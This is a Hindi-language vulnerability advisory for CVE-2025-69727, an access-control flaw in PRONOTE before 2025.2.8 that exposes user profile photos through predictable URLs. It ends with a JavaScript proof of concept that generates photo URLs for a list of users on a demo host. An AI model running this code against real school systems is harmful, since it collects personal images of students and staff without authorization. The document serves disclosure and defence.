
CVE-2025-69727
PRONOTE - 202X.X.X < 2025.2.8
INDEX-EDUCATION PRONOTE में 2025.2.8 से पहले एक अनुचित पहुँच नियंत्रण कमजोरी मौजूद है। प्रभावित घटक (composeUrlImgPhotoIndividu) पूर्वानुमानित पहचानकर्ताओं जैसे उपयोगकर्ता आईडी और नामों के आधार पर उपयोगकर्ता प्रोफ़ाइल छवियों के सीधे URL बनाने की अनुमति देते हैं। इन URL को उत्पन्न करने या एक्सेस करते समय प्राधिकरण जांच और दर-सीमा की कमी के कारण, एक अप्रमाणित या अनधिकृत अभिनेता अनुमानित या ज्ञात पहचानकर्ताओं के साथ अनुरोध बनाकर उपयोगकर्ताओं की प्रोफ़ाइल तस्वीरें प्राप्त कर सकता है।
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});